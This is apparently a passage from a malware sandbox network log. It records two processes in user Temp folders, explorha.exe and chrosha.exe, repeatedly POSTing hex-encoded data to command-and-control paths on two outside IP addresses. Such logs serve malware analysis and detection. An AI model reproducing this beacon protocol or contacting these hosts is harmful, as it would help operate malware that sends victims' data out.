Apr 19, 2024 03:34:51.344213009 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1061 | 192.168.2.5 | 50915 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:51.215562105 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:51.463217020 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1062 | 192.168.2.5 | 50916 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:51.702980042 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:51.947644949 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1063 | 192.168.2.5 | 50917 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:51.708405972 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:51.953108072 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1064 | 192.168.2.5 | 50918 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:52.199795961 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:52.453732967 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1065 | 192.168.2.5 | 50919 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:52.307921886 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:52.556504011 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1066 | 192.168.2.5 | 50920 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:52.811947107 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:53.064080000 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1067 | 192.168.2.5 | 50921 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:52.819617987 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:53.064095020 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1068 | 192.168.2.5 | 50922 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:53.315766096 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:53.564523935 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1069 | 192.168.2.5 | 50923 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:53.423361063 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:53.674483061 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1070 | 192.168.2.5 | 50924 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:53.928988934 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:54.181164980 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1071 | 192.168.2.5 | 50925 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:53.931996107 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:34:54.177035093 CEST | Bytes transferred: 197 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID: 1072 | Source IP: 192.168.2.5 | Source Port: 50926 | Destination IP: 193.233.132.167 | Destination Port: 80 | PID: 8024 | Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp: Apr 19, 2024 03:34:54.426840067 CEST | Bytes transferred: 309 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Timestamp: Apr 19, 2024 03:34:54.676167011 CEST | Bytes transferred: 196 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 1073 | Source IP: 192.168.2.5 | Source Port: 50927 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 4484 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp: Apr 19, 2024 03:34:54.538641930 CEST | Bytes transferred: 158 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:34:54.784054041 CEST | Bytes transferred: 219 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID: 1074 | Source IP: 192.168.2.5 | Source Port: 50929 | Destination IP: 193.233.132.167 | Destination Port: 80 | PID: 8024 | Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp: Apr 19, 2024 03:34:55.036381006 CEST | Bytes transferred: 155 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:34:55.281267881 CEST | Bytes transferred: 197 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID: 1075 | Source IP: 192.168.2.5 | Source Port: 50928 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 4484 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp: Apr 19, 2024 03:34:55.037976980 CEST | Bytes transferred: 312 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Timestamp: Apr 19, 2024 03:34:55.293566942 CEST | Bytes transferred: 196 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 1076 | Source IP: 192.168.2.5 | Source Port: 50930 | Destination IP: 193.233.132.167 | Destination Port: 80 | PID: 8024 | Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp: Apr 19, 2024 03:34:55.539454937 CEST | Bytes transferred: 309 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Timestamp: Apr 19, 2024 03:34:55.788157940 CEST | Bytes transferred: 196 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 1077 | Source IP: 192.168.2.5 | Source Port: 50931 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 4484 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp: Apr 19, 2024 03:34:55.651017904 CEST | Bytes transferred: 158 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:55.895720005 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
